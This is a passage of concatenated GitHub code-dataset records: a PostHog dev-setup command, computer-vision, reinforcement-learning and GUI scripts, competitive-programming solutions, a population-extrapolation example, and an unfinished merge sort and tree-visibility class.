Use the more robust generate_demo_data command instead.\\n\") # noqa T201\n with transaction.atomic():\n _, team, user = User.objects.bootstrap(\n organization_name=ORGANIZATION_NAME,\n email=\"test@posthog.com\",\n password=\"12345678\",\n first_name=\"Jane Doe\",\n is_staff=True,\n team_fields={\n \"name\": TEAM_NAME,\n \"api_token\": \"e2e_token_1239\",\n \"completed_snippet_onboarding\": True,\n \"ingested_event\": True,\n },\n )\n EventDefinition.objects.create(team=team, name=\"$pageview\")\n EventDefinition.objects.create(team=team, name=\"$autocapture\")\n self.add_property_definition(team, \"$current_url\")\n self.add_property_definition(team, \"$browser\")\n self.add_property_definition(team, \"$os\")\n self.add_property_definition(team, \"usage_count\")\n self.add_property_definition(team, \"volume\")\n self.add_property_definition(team, \"is_first_movie\")\n PropertyDefinition.objects.create(name=\"name\", type=PropertyDefinition.Type.PERSON, team=team)\n PropertyDefinition.objects.create(name=\"is_demo\", type=PropertyDefinition.Type.PERSON, team=team)\n\n PersonalAPIKey.objects.create(\n user=user,\n label=\"e2e_demo_api_key key\",\n secure_value=hash_key_value(\"e2e_demo_api_key\"),\n )\n if not options[\"no_data\"]:\n create_demo_data(team)\n\n if options[\"create_e2e_test_plugin\"]:\n self.create_plugin(team)\n\n @staticmethod\n def add_property_definition(team: Team, property: str) -> None:\n PropertyDefinition.objects.create(team=team, name=property)\n EventProperty.objects.create(team=team, event=\"$pageview\", property=property)\n EventProperty.objects.create(team=team, event=\"$autocapture\", property=property)\n\n def create_plugin(self, team):\n plugin = Plugin.objects.create(organization=team.organization, name=\"e2e test plugin\", plugin_type=\"source\")\n plugin_config = PluginConfig.objects.create(plugin=plugin, team=team, order=1, config={})\n\n PluginSourceFile.objects.update_or_create(\n plugin=plugin,\n filename=\"plugin.json\",\n source='{ \"name\": \"e2e test plugin\", \"config\": [] }',\n )\n PluginSourceFile.objects.update_or_create(\n plugin=plugin,\n filename=\"index.ts\",\n source=\"\"\"\n export async function onEvent(event, meta) {\n const ratelimit = await meta.cache.get('ratelimit')\n if (!ratelimit && event.event !== '$pluginEvent') {\n posthog.capture('$pluginEvent', { event: event.event })\n await meta.cache.set('ratelimit', 1)\n await meta.cache.expire('ratelimit', 60)\n }\n }\n \"\"\",\n )\n\n plugin_config.enabled = True\n plugin_config.save()\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/setup_dev.py","file_name":"setup_dev.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"595263349","text":"### LAST ITERATION\n### ITER-5\n\n### comments are written for better understanding.....!\n\nimport cv2\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\ndef compute_norm(arr):\n nume = arr-arr.mean()\n deno = np.sqrt((nume**2).sum())\n return nume/deno\n\nmax_ssd = 10\nmax_d = 15\n# width = 10\nhb = 4\ncost = 100\n# height = 3\n# comps = width -2*hb + 2\n# left= np.random.randint(0,34,size = (height,width))\n# right = np.roll(left, -2,axis = 1)\n\nprint(\"Block size is \",2*hb+1)\nprint(\"Max disparity is \",max_d)\n\nleft = cv2.imread(\"Inputs/tsukuba_l.png\",0)\nright = cv2.imread(\"Inputs/tsukuba_r.png\",0)\n\nheight, width = left.shape\n\ndisparity_img = np.zeros(shape = (height,width))\n\n# print(\"Left 
is \\n\",left)\n# print(\"Right is \\n\",right)\n\ntik = time.time()\n\n# iterate thru height.!\nfor h in tqdm(range(hb,height-hb)):\n# print(h)\n lshift = 0\n DSI = np.zeros(shape = (width-2*hb,max_d))\n # print(\"DSI shape is \",DSI.shape, h)\n #for every height, u need a DSI so u init it \n for w in range(hb,width-hb):\n if (w-hb)>=max_d: lshift+=1\n # for every pixel in left-img, scan upto dmax and compute ssd, fill this ssd inside DSI\n for d in range(0,max_d):\n rshift = w-d-hb\n if(rshift>=0):\n left_patch = left[h-hb:h+hb+1,w-hb:w+hb+1].copy()\n right_patch = right[h-hb:h+hb+1,w-hb-rshift+lshift:w+hb+1-rshift+lshift].copy()\n# print(\"Left-patch is \\n{}\\nRigth patch is \\n{}\".format(left_patch,right_patch))\n ssd = ((compute_norm(left_patch)-compute_norm(right_patch))**2).sum()\n# print(\"SSD is {}\\n\".format(ssd))\n\n index = rshift-lshift\n else:\n index = d\n ssd = max_ssd\n pass\n DSI[w-hb,index] = ssd\n \n DSI[DSI==0] = np.inf\n \n for i in range(1,DSI.shape[0]):\n for j in range(i,min(DSI.shape[1],i+max_d)):\n DSI[i,j-i] = DSI[i,j-i] + min(DSI[i-1,:] + cost*np.abs(np.arange(0,DSI.shape[1])-(i-j)))\n\n\n# curr_id = np.argmin(DSI[-1])\n# curr_cost = DSI[-1,curr_id]\n# # print(curr_cost)\n# l = [curr_id]\n# # print(l)\n# for row in range(DSI.shape[0]-2,-1,-1):\n# # print(M[row],np.abs(curr_cost-M[row]))\n# curr_id = np.argmin(np.abs(curr_cost-DSI[row]))\n# curr_cost = DSI[row,curr_id]\n# l.append(curr_id) \n \n # c = np.zeros(DSI.shape[0])\n # for i in range(DSI.shape[0]-1,-1,-1):\n # b = np.argmin(DSI[i,:])\n # c[i] = i\n\n disparity_img[h,hb:-hb] = np.argmin(DSI, axis = 1)\n # disparity_img[h,hb:-hb] = c\n\n# print(\"One pixel disparity compared at\\n\")\n# print(np.round(DSI,decimals = 2).T)\n\nprint(\"Time took \",time.time()-tik)\n\nfinal_img = ((disparity_img/disparity_img.max())*255).astype(np.uint8)\n\ncv2.imwrite(\"Outputs/Disparity_dynamic.png\",final_img)\n\ncv2.imshow(\"final\",final_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"ChetanPatil28/Epipolar-Geometry","sub_path":"Stereo_Correspondence/Dynamic.py","file_name":"Dynamic.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23787157531","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# This is a drystal developer tool, it is not intended to help game developpers.\n\nfrom runner import *\nimport itertools\nimport random\n\n\nprefix = 'BUILD_'\nconfigs = {\n'UTILS': [],\n'GRAPHICS': [],\n'STORAGE': ['UTILS'],\n'AUDIO': [],\n'FONT': ['GRAPHICS'],\n'WEB': [],\n'PARTICLE': ['GRAPHICS'],\n'PHYSICS': [],\n}\nconfigs_names = ['UTILS', 'GRAPHICS', 'STORAGE', 'AUDIO', 'FONT', 'WEB', 'PARTICLE', 'PHYSICS']\n\ndef get_index_of(v):\n for i, c in enumerate(configs_names):\n if c == v:\n return i\n return -1\n\n\ndef get_boolean_permutations():\n permutations = set()\n permutations_tmp = list(itertools.product([True, False], repeat=len(configs)))\n for p in permutations_tmp:\n pl = list(p)\n for i, v in enumerate(p):\n if v:\n for dep in configs[configs_names[i]]:\n pl[get_index_of(dep)] = True\n permutations.add(tuple(pl))\n\n return permutations\n\n\ndef get_defines_permutations():\n boolean_permutations = get_boolean_permutations()\n defines_permutations = []\n for p in boolean_permutations:\n defines = []\n for i, b in enumerate(p):\n if b:\n defines.append(prefix + configs_names[i] + '=YES')\n else:\n defines.append(prefix + configs_names[i] + '=NO')\n defines_permutations.append(defines)\n\n 
random.shuffle(defines_permutations)\n return defines_permutations\n\n\ndef run_web(args):\n defines_permutations = get_defines_permutations()\n nperm = str(len(defines_permutations))\n print(I + 'Building '+ nperm + ' permutations...')\n for i, d in enumerate(defines_permutations):\n print(I + 'Permutation ' + str(i + 1) + '/' + nperm)\n cmake_update('build-web', EMSCRIPTEN_CMAKE_DEFINES + d, True)\n\n\ndef run_native(args):\n build_type = 'Debug'\n directory = BUILD_NATIVE_DEBUG\n if args.release:\n build_type = 'Release'\n directory = BUILD_NATIVE_RELEASE\n defines_permutations = get_defines_permutations()\n nperm = str(len(defines_permutations))\n print(I + 'Building '+ nperm + ' permutations...')\n for i, d in enumerate(defines_permutations):\n print(I + 'Permutation ' + str(i + 1) + '/' + nperm)\n cmake_update(directory, ['CMAKE_BUILD_TYPE=' + build_type] + NATIVE_CMAKE_DEFINES + d, True)\n\n\nif __name__ == '__main__':\n import argparse\n\n add_signal_handlers()\n\n parser = argparse.ArgumentParser(description='Drystal: build\\'em all! Try to build every permutations of compilation flags BUILD_***')\n subparsers = parser.add_subparsers(help='sub-commands')\n\n parser_native = subparsers.add_parser('native', help='native builds',\n description='native builds')\n parser_native.set_defaults(func=run_native)\n parser_native.add_argument('-r', '--release', help='compile in release mode',\n action='store_true', default=False)\n\n parser_web = subparsers.add_parser('web', help='web builds',\n description='web builds')\n parser_web.set_defaults(func=run_web)\n parser_web.add_argument('-d', '--destination', help='folder where web files will be put', default='web')\n\n args = parser.parse_args()\n args.func(args)\n\n","repo_name":"kidanger/Drystal","sub_path":"tools/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"53"} +{"seq_id":"4461315276","text":"import tkinter as tk \nfrom tkinter import * \nfrom tkinter.messagebox import CANCEL, OK \n\nfrom services import player_services\n\nclass Dialog(tk.Toplevel):\n def __init__(self, parent, player_id, price=None):\n super().__init__(parent)\n self.title(\"Set Target Price\")\n frm = tk.Frame(self, borderwidth=4)\n\n player = player_services.get_player(player_id)\n\n tk.Label(frm, text=f\"Target Price for {player.name}:\").grid(row=1, column=0)\n self.price_tv = IntVar()\n if price is not None:\n self.price_tv.set(price)\n price_entry = tk.Entry(frm, textvariable=self.price_tv)\n price_entry.grid(row=1, column=1)\n\n tk.Button(frm, text=\"OK\", command=self.ok_click).grid(row=3, column=0)\n tk.Button(frm, text=\"Cancel\", command=self.cancel_click).grid(row=3, column=1)\n\n self.bind('', self.enter_pressed)\n\n self.status = CANCEL\n\n frm.pack()\n\n self.lift()\n self.focus_force()\n\n self.protocol(\"WM_DELETE_WINDOW\", self.cancel_click)\n\n price_entry.focus()\n price_entry.selection_range(0, END)\n\n self.wait_window()\n \n def enter_pressed(self, event):\n self.ok_click()\n \n def ok_click(self):\n self.price = self.price_tv.get()\n self.status = OK\n self.destroy()\n \n def cancel_click(self):\n self.price = None\n self.status = CANCEL\n self.destroy()","repo_name":"blue-shoes/ottoneu-toolbox","sub_path":"ui/dialog/draft_target.py","file_name":"draft_target.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} 
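builder.py above enumerates every on/off combination of the `BUILD_*` flags and then forces each enabled flag's dependencies on before deduplicating. A compact sketch of that single-pass closure (same idea on a smaller, made-up dependency map; a transitive closure would need a fixpoint loop, which the original also skips):

import itertools

DEPS = {"UTILS": [], "GRAPHICS": [], "STORAGE": ["UTILS"], "FONT": ["GRAPHICS"]}
NAMES = list(DEPS)

def closed_permutations():
    seen = set()
    for combo in itertools.product([True, False], repeat=len(NAMES)):
        flags = dict(zip(NAMES, combo))
        # Single-pass closure: every enabled flag switches its deps on.
        for name, enabled in list(flags.items()):
            if enabled:
                for dep in DEPS[name]:
                    flags[dep] = True
        seen.add(tuple(flags[n] for n in NAMES))
    return seen

perms = closed_permutations()
for p in perms:
    flags = dict(zip(NAMES, p))
    assert not (flags["FONT"] and not flags["GRAPHICS"])  # dependency honored
print(len(perms))  # fewer than 2**4: dependency-violating raw combos collapse together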
+{"seq_id":"26877746955","text":"#!/usr/bin/env python3\nimport sys\nimport os\nimport numpy as np\n\nsys.path.append(os.path.abspath(os.path.join(\"../../\", \"src\")))\nimport gym\nimport argparse\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\nimport actions\nimport agents\nimport runner\nfrom wrapper import build_env_wrapper\nimport wrapper\nimport loss\nimport config\nfrom pg_common import calculate_entropy, calculate_kl_divergence\nfrom networks import dqn_cnn_net, dqn_mlp_net\nfrom common import hyperparameters, logger, utils\nfrom memory import ExperienceReplayBuffer\n\n\nif __name__ == \"__main__\":\n # CONFIG\n params = config.PARAMS[\"cartpole\"]\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--cuda\", default=False, action=\"store_true\", help=\"Enable Cuda\"\n )\n args = parser.parse_args()\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n\n # INIT ENV\n env, observation_space, action_space = build_env_wrapper(\n params[\"env_name\"], env_type=params[\"env_type\"]\n )\n\n # LOGGING\n writer = SummaryWriter(comment=\"-\" + params[\"run_name\"] + \"-vpg\")\n\n # NETWORK\n net = dqn_mlp_net.Network(observation_space, action_space, hidden_layer_size=32).to(\n device\n )\n\n # AGENT\n agent = agents.PolicyGradientAgent(\n net, preprocessor=utils.float32_preprocessor, apply_softmax=True\n )\n\n # RUNNER\n exp_source = runner.RunnerSourceFirstLast(\n env, agent, gamma=params[\"gamma\"], steps_count=params[\"step_count\"]\n )\n optimizer = optim.Adam(net.parameters(), lr=params[\"learning_rate\"])\n\n total_rewards = []\n step_idx = 0\n done_episodes = 0\n\n batch_episodes = 0\n batch_states, batch_actions, batch_scales = [], [], []\n cur_rewards = []\n reward_sum = 0\n\n with logger.RewardTracker(writer, params[\"stop_reward\"]) as reward_tracker:\n for step_idx, exp in enumerate(exp_source):\n reward_sum += exp.reward\n baseline = reward_sum / (step_idx + 1)\n writer.add_scalar(\"baseline\", baseline, step_idx)\n\n batch_states.append(exp.state)\n batch_actions.append(int(exp.action))\n batch_scales.append(exp.reward - baseline)\n\n new_rewards = exp_source.pop_total_rewards()\n if new_rewards:\n done_episodes += 1\n reward = new_rewards[0]\n total_rewards.append(reward)\n if reward_tracker.reward(new_rewards[0], step_idx):\n break\n\n if len(batch_states) < params[\"batch_size\"]:\n continue\n\n states_v = torch.FloatTensor(batch_states)\n batch_actions_t = torch.LongTensor(batch_actions)\n batch_scale_v = torch.FloatTensor(batch_scales)\n\n # calculate loss\n optimizer.zero_grad()\n logits_v = net(states_v)\n log_prob_v = F.log_softmax(logits_v, dim=1)\n log_prob_actions_v = (\n batch_scale_v * log_prob_v[range(params[\"batch_size\"]), batch_actions_t]\n )\n loss_policy_v = -log_prob_actions_v.mean()\n\n # # calculate entropy\n entropy_loss, prob_v = calculate_entropy(\n logits_v, log_prob_v, beta=params[\"beta\"]\n )\n loss_v = loss_policy_v + entropy_loss\n\n loss_v.backward()\n optimizer.step()\n\n # calc KL-div\n kl_div_v = calculate_kl_divergence(net(states_v), prob_v)\n writer.add_scalar(\"kl\", kl_div_v.item(), step_idx)\n\n # calculate the stats\n grad_max = 0.0\n grad_means = 0.0\n grad_count = 0\n for p in net.parameters():\n grad_max = max(grad_max, p.grad.abs().max().item())\n grad_means += (p.grad ** 2).mean().sqrt().item()\n grad_count += 1\n\n batch_states.clear()\n batch_actions.clear()\n 
batch_scales.clear()\n","repo_name":"djbyrne/RL_Workbench","sub_path":"algos/policy_gradients/vanilla_policy_gradient.py","file_name":"vanilla_policy_gradient.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6409273393","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-16 17:22\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nimport os\n\nfrom utils import load_dict,write_dict\n\n\nprint('modify parameters...')\ninfo = load_dict()\ninput_size = info['input_size']\ntrain_num = int(info['train'])\n\n# 没张图过273便,和作者训练的对应\nmax_batches = int(train_num * 273 / 64)\n# 到这一step调整学习旅\nstep1 = int(max_batches * 0.8)\nstep2 = int(max_batches * 0.9)\n\nn_clusters = info['n_clusters']\nmask_index = 0\n\nn_classes = info['n_classes']\n\nanchors = info['anchors']\n\nf2 = open('./darknet/cfg/yolov3-' + str(input_size) + '.cfg', 'w', encoding = 'utf-8')\n\nwith open('./darknet/cfg/yolov3.cfg', 'r', encoding = 'utf-8') as f:\n\tcontents = f.readlines()\n\n\tfor content in contents:\n\n\t\tif content.startswith('subdivisions'):\n\t\t\tif input_size == 416:\n\t\t\t\tcontent = 'subdivisions=8' + '\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\telif input_size == 608:\n\t\t\t\tcontent = 'subdivisions=16' + '\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\telse:\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\t\tcontent = 'subdivisions=32' + '\\n'\n\n\t\tif content.startswith('width'):\n\t\t\tcontent = 'width=' + str(input_size) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('height'):\n\t\t\tcontent = 'height=' + str(input_size) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('max_batches='):\n\t\t\tcontent = 'max_batches=' + str(max_batches) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\t\t\twrite_dict('max_batches', max_batches)\n\n\t\tif content.startswith('steps'):\n\t\t\tcontent = 'steps=' + str(step1) + ',' + str(step2) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\t\t#等好之前有个空格,和不用修改的filters区分开来\n\t\tif content.startswith('filters ='):\n\t\t\tcontent = 'filters =' + str(int(n_clusters / 3 * (n_classes + 5))) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('mask'):\n\t\t\tif n_clusters == 6:\n\t\t\t\tcontent = 'mask=' + str(n_clusters - mask_index -2) + ',' + str(n_clusters - mask_index - 1) +'\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\tif n_clusters == 9:\n\t\t\t\tcontent = 'mask=' + str(n_clusters - mask_index -3) + ',' + str(n_clusters - mask_index - 2) + ',' + str(n_clusters - mask_index -1) +'\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\tmask_index += int(n_clusters / 3)\n\n\t\tif content.startswith('anchors'):\n\t\t\tcontent = 'anchors=' + anchors +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('classes'):\n\t\t\tcontent = 'classes=' + str(n_classes) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('num'):\n\t\t\tcontent = 'num=' + str(n_clusters) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tf2.write(content)\n\nf2.close()\n\nf3 = open('./darknet/examples/detector.backup', 'a+', encoding = 'utf-8')\nwith open('./darknet/examples/detector.c', 'r', encoding = 'utf-8') as f:\n\tcontents = f.readlines()\n\n\tfor content in contents:\n\n\t\tif content.startswith(' int dim = '):\n\t\t\tcontent = ' int dim = (rand() % 10 + ' + str(int((input_size / 32) - 9)) + ') * 32;' + 
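The REINFORCE loop that finishes above weights each action's log-probability by `reward - baseline` and adds an entropy bonus. The core loss math in isolation, with toy tensors standing in for the record's runner (a sketch, not the repo's API):

import torch
import torch.nn.functional as F

torch.manual_seed(0)
logits = torch.randn(4, 2, requires_grad=True)    # 4 states, 2 actions
actions = torch.tensor([0, 1, 1, 0])
rewards = torch.tensor([1.0, 0.0, 2.0, 1.0])

baseline = rewards.mean()                  # the record keeps a running mean
scales = rewards - baseline                # centered return, for variance reduction

log_prob = F.log_softmax(logits, dim=1)
chosen = log_prob[torch.arange(4), actions]
loss_policy = -(scales * chosen).mean()    # REINFORCE: ascend the expected return

prob = log_prob.exp()
entropy = -(prob * log_prob).sum(dim=1).mean()
beta = 0.01
loss = loss_policy - beta * entropy        # entropy bonus discourages policy collapse

loss.backward()
print(float(loss), float(logits.grad.abs().sum()))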
'\\n'\n\t\t\tprint(content.replace('\\n','').lstrip())\n\n\t\tif content.startswith('    if (get_current_batch(net)+200 > net->max_batches) dim'):\n\t\t\tcontent = '    if (get_current_batch(net)+200 > net->max_batches) dim = ' + str(input_size) + ';' + '\\n'\n\t\t\tprint(content.replace('\\n','').lstrip())\n\n\t\tf3.write(content)\nf3.close()\n\nos.remove('./darknet/examples/detector.c')\nos.rename('./darknet/examples/detector.backup','./darknet/examples/detector.c')\n","repo_name":"isyanan1024/YOLOV3","sub_path":"modify_parameters.py","file_name":"modify_parameters.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24232355225","text":"'''\nIdea:\n    inspect num: if it is even, apply the operation (halve it); if it is odd, subtract one first and then operate\n'''\ndef f(num):\n    temp=0\n    while num>0:\n        if num%2==0:\n            temp+=1\n            num=num//2\n        else:\n            num=num-1\n            temp+=1\n    return temp\n\nnum=8\nprint(f(num))\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/207/1342.py","file_name":"1342.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24170673521","text":"import io\r\nimport sys\r\n#sys.setrecursionlimit(10**7)\r\nfrom collections import deque,defaultdict\r\nfrom heapq import heappush,heappop \r\nfrom itertools import product,combinations,accumulate\r\ndef input(): return sys.stdin.readline().strip()\r\ndef INT(): return int(input())\r\ndef MAP(): return map(int,input().split())\r\ndef LIST(): return list(map(int,input().split()))\r\nINF = float('inf')\r\ndirc = [(0,1),(0,-1),(1,0),(-1,0)]\r\n#dirc2 = [(0,1),(0,-1),(1,0),(-1,0),(-1,-1),(-1,1),(1,-1),(1,1)]\r\n#mod = 10**9+7\r\n#mod = 998244353\r\n######################################################\r\n_INPUT = \"\"\"\\\r\n2 2021\r\n2 3\r\n\"\"\"\r\nsys.stdin = io.StringIO(_INPUT)\r\n######################################################\r\n\"\"\"\r\nBinary search on the answer\r\nGiven a value X, consider the decision problem \"can such-and-such be satisfied?\";\r\nsolving that decision problem repeatedly pins down the boundary between the X that give Yes and the X that give No,\r\nwhich yields the answer to the original problem\r\n\r\nApproach 1: at each operation, repeatedly pick the attraction whose fun is currently largest;\r\n decrementing by 1 step by step TLEs, so speed it up by dropping\r\n straight down to the next largest value in one go\r\nApproach 2: binary-search on whether, after riding every attraction whose fun is at least m,\r\n the number of rides taken is at most K\r\n\"\"\"\r\n######################################################\r\ndef is_ok(arg):\r\n    # is the condition satisfied? defined per problem\r\n    cnt = 0\r\n    for x in A:\r\n        if x>=arg:# for each ride, count how many values are at least arg\r\n            cnt += x-arg+1\r\n    return cnt<=K # the condition holds when the total number of rides with fun >= arg is at most K\r\n\r\ndef meguru_bisect(ng, ok):\r\n    '''\r\n    Takes the initial ng and ok and returns the smallest (or largest) ok that satisfies is_ok\r\n    Define is_ok first\r\n    ng and ok are (the smallest possible value - 1) and (the largest possible value + 1)\r\n    Flip them as appropriate when max and min are reversed\r\n    '''\r\n    while (abs(ok - ng) > 1):\r\n        mid = (ok + ng) // 2\r\n        if is_ok(mid):\r\n            ok = mid\r\n        else:\r\n            ng = mid\r\n    return ok\r\n\r\nN,K = MAP()\r\nA = LIST()\r\nm = meguru_bisect(ng=0,ok=2*10**9+1)\r\nrem = K\r\nans = 0\r\n# take every element >= m (added to ans via the arithmetic-series sum formula)\r\nfor i in range(N):\r\n    x = A[i]\r\n    if x>=m:\r\n        diff = x-m+1\r\n        ans += diff*(x+m)//2\r\n        rem -= diff\r\n# for the shortfall below K picks, take m-1 for each remaining pick\r\nans += rem*(m-1)\r\nprint(ans)\r\n","repo_name":"kaichan1224/Atcoder","sub_path":"探索/二分探索/決め打ちニブタン(解説AC)ABC216E.py","file_name":"決め打ちニブタン(解説AC)ABC216E.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27377263872","text":"import pandas as pd\nimport ukpopulation.nppdata as NPPData\nimport ukpopulation.snppdata as SNPPData\nimport ukpopulation.utils as utils\n\n# initialise the population modules\nnpp 
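The AtCoder solution above is a textbook "binary search on the answer": `is_ok(m)` is a monotone yes/no question and `meguru_bisect` tightens the (ng, ok) bracket until the two are adjacent. The same bracket convention on a toy predicate, with the predicate passed in explicitly instead of read from globals as the record does:

def meguru_bisect(ng, ok, is_ok):
    # Invariant: is_ok(ok) is True and is_ok(ng) is False; shrink to adjacency.
    while abs(ok - ng) > 1:
        mid = (ok + ng) // 2
        if is_ok(mid):
            ok = mid
        else:
            ng = mid
    return ok

# Smallest integer x with x * x >= 2_000_000 (a monotone predicate).
ans = meguru_bisect(ng=0, ok=2 * 10**9 + 1, is_ok=lambda x: x * x >= 2_000_000)
print(ans, (ans - 1) ** 2 < 2_000_000 <= ans ** 2)  # 1415 True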
= NPPData.NPPData()\nsnpp = SNPPData.SNPPData()\n\n# start with an empty data frame\nresult = pd.DataFrame()\n\ncountry = utils.WA\nhorizon = 2050\n\n# get the first year where extrapolation is necessary, extrapolate to 2050\nex_years = range(snpp.max_year(country) + 1, horizon + 1)\n\n\n# loop over all the Welsh LADs \nfor lad in snpp.data[country].GEOGRAPHY_CODE.unique():\n print(lad)\n\n # extrapolate and aggregate\n lad = snpp.extrapolagg([\"GENDER\", \"C_AGE\"], npp, lad, ex_years)\n # append to data\n result = result.append(lad, ignore_index=True)\n\n# write out results\nresult.to_csv(\"snpp_extrap_{}_{}.csv\".format(country, horizon), index=False)\n\n","repo_name":"nismod/ukpopulation","sub_path":"doc/example_extrapolate_all.py","file_name":"example_extrapolate_all.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"17832839800","text":"def merge_sort(array):\n if len(array) == 1:\n return array\n\n middle_idx = len(array) // 2\n left_array = array[:middle_idx]\n right_array = array[middle_idx:]\n return merge_sorted_array(merge_sort(left_array), merge_sort(right_array))\n\n\ndef merge_sorted_array(left_half, right_half):\n sorted_array = [None] * (len(left_half) + len(right_half))\n k = i = j = 0\n while i < len(left_half) and j < len(right_half):\n if left_half[i] <= right_half[j]:\n sorted_array[k] = left_half[i]\n i += 1\n else:\n sorted_array[k] = right_half[j]\n j += 1\n k += 1\n while i < len(left_half):\n sorted_array[k] = left_half[i]\n i += 1\n k += 1\n while j < len(right_half):\n sorted_array[k] = right_half[j]\n j += 1\n k += 1\n\n return sorted_array\n\n\ndef mergeSort(array):\n # Write your code here.\n if len(array) <= 1:\n return array\n aux_array = array[:]\n ","repo_name":"manojkumar1053/random_code_practice","sub_path":"AE/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2274877899","text":"# https://adventofcode.com/2022/day/8\n\nimport os\nfrom abc import ABC, abstractproperty\nfrom functools import cached_property\nfrom pathlib import Path\nfrom typing import List, NamedTuple, Union\n\n\nclass Obstacle(NamedTuple):\n height: int\n coord: int\n\n\nclass TreeMap:\n OUTSIDE_HEIGHT: int = 10\n\n size: int\n trees: List[List[\"Inner\"]]\n\n def __init__(self, data: List[List[int]]) -> None:\n self.size = len(data)\n self.trees = [[] for _ in range(self.size)]\n self._parse_data(data)\n\n def get_tree(self, x: int, y: int) -> \"Inner\":\n if 0 <= x < self.size and 0 <= y < self.size:\n return self.trees[y][x]\n return self.Tree(self.OUTSIDE_HEIGHT, x, y)\n\n def _parse_data(self, data: List[List[int]]):\n for y, row in enumerate(data):\n for x, height in enumerate(row):\n self.trees[y].append(self.Tree(height, x, y))\n\n class Inner(ABC):\n height: int\n x: int\n y: int\n\n @abstractproperty\n def upper_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def right_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def lower_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def left_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def is_visible(self) -> bool:\n raise NotImplementedError()\n\n def get_scenic_score(self) -> int:\n raise NotImplementedError()\n\n def Tree(self, height: int, x: int, y: 
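The merge-sort record above is cut off mid-function: `mergeSort` copies the input into `aux_array` and the text ends there. One plausible completion, assuming the standard auxiliary-array pattern that the file's own `merge_sort`/`merge_sorted_array` pair suggests (a guess at the author's intent, not recovered source):

def mergeSort(array):
    if len(array) <= 1:
        return array
    aux_array = array[:]
    mid = len(aux_array) // 2
    left = mergeSort(aux_array[:mid])
    right = mergeSort(aux_array[mid:])
    # Merge the two sorted halves back together.
    merged, i, j = [], 0, 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    merged.extend(left[i:])
    merged.extend(right[j:])
    return merged

print(mergeSort([8, 5, 2, 9, 5, 6, 3]))  # [2, 3, 5, 5, 6, 8, 9]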
int) -> Inner:\n tree_map = self\n\n class _Tree(TreeMap.Inner):\n def __init__(self, height: int, x: int, y: int) -> None:\n self.height = height\n self.tree_map = tree_map\n self.x = x\n self.y = y\n\n @cached_property\n def upper_obstacle(self) -> Obstacle:\n tree_up = self.tree_map.get_tree(self.x, self.y - 1)\n while tree_up.height < self.height:\n tree_up = self.tree_map.get_tree(self.x, tree_up.upper_obstacle.coord)\n return Obstacle(tree_up.height, tree_up.y)\n\n @cached_property\n def right_obstacle(self) -> Obstacle:\n tree_right = self.tree_map.get_tree(self.x + 1, y)\n while tree_right.height < self.height:\n tree_right = self.tree_map.get_tree(tree_right.right_obstacle.coord, self.y)\n return Obstacle(tree_right.height, tree_right.x)\n\n @cached_property\n def lower_obstacle(self) -> Obstacle:\n tree_down = self.tree_map.get_tree(self.x, self.y + 1)\n while tree_down.height < self.height:\n tree_down = self.tree_map.get_tree(self.x, tree_down.lower_obstacle.coord)\n return Obstacle(tree_down.height, tree_down.y)\n\n @cached_property\n def left_obstacle(self) -> Obstacle:\n tree_left = self.tree_map.get_tree(self.x - 1, self.y)\n while tree_left.height < self.height:\n tree_left = 